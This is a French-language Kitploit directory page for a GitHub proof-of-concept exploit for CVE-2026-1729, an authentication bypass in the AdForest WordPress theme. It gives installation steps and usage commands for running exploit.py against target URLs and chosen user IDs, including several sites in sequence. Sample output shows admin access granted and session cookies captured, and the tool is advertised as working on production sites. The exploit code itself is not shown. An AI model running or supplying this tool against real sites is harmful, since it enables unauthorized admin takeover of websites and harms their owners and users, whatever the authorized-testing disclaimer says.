Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — The AdForest theme for WordPress is vulnerable to authentication bypass in all versions including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in, including admin | Kitploit
Outils/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
il y a 6 moisPas encore vérifié

À propos

The AdForest theme for WordPress is vulnerable to authentication bypass in all versions including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in, including admin

Partager

CVE-2026-1729 - Preuve de concept de contournement d'authentification AdForest WordPress

Description

Preuve de concept simple pour CVE-2026-1729 (PoC) - Vulnérabilité de contournement d'authentification dans le thème WordPress AdForest. Réalisé par f3ds cr3w est 2oo2 blog

Fonctionnalités

  • ✅ Accès administrateur direct sans identifiants
  • ✅ Fonctionne sur des instances WordPress en production
  • ✅ Aucune configuration Docker requise
  • ✅ Interface en ligne de commande simple
  • ✅ Persistance de session

Prérequis

  • Python 3.6+
  • Bibliothèque requests

Installation

root@kitploit:~
pip install requests

Utilisation

Utilisation basique

root@kitploit:~
python poc/exploit.py https://site-cible.com

Cibler un ID utilisateur spécifique

root@kitploit:~
python poc/exploit.py https://site-cible.com --user-id 2

Exemples

root@kitploit:~
# Exploiter l'admin par défaut (ID utilisateur 1)
python poc/exploit.py https://example.com

# Exploiter un compte utilisateur spécifique
python poc/exploit.py https://example.com --user-id 5

# Tester plusieurs cibles
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

Sortie

root@kitploit:~
CVE-2026-1729 - Contournement d'authentification AdForest WordPress
=======================================================
ATTENTION : Pour tests autorisés uniquement !
=======================================================
[+] Cible : https://example.com
[+] ID utilisateur ciblé : 1
[+] Envoi de l'exploit vers : https://example.com/wp-admin/admin-ajax.php
[+] SUCCÈS ! Accès administrateur accordé
[+] URL admin : https://example.com/wp-admin/
[+] Cookies de session : {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Connecté en tant que : admin

🎯 Exploit terminé avec succès !
Vous avez maintenant un accès administrateur au site WordPress.

Que se passe-t-il après l'exploit

  1. Accès administrateur : Vous obtenez un accès complet à /wp-admin/
  2. Persistance de session : L'exploit conserve les cookies de session
  3. Informations utilisateur : Indique quel compte a été compromis
  4. Accès direct : Vous pouvez immédiatement accéder au tableau de bord WordPress

Remarques

  • Utilisation légale : Utilisez uniquement sur des sites que vous possédez ou pour lesquels vous avez une autorisation explicite de test
  • Prérequis de la cible : Le site doit avoir le thème AdForest installé
  • Taux de réussite : Fonctionne sur les versions vulnérables du thème AdForest
  • Aucune installation : Pas besoin d'installer quoi que ce soit sur le serveur cible

Dépannage

Si l'exploit échoue :

  1. Vérifiez que le thème AdForest est installé
  2. Vérifiez que le site fonctionne sous WordPress
  3. Assurez-vous que la version du thème est vulnérable
  4. Aucun WAF ou plugin de sécurité ne bloque la requête
Télécharger l’outil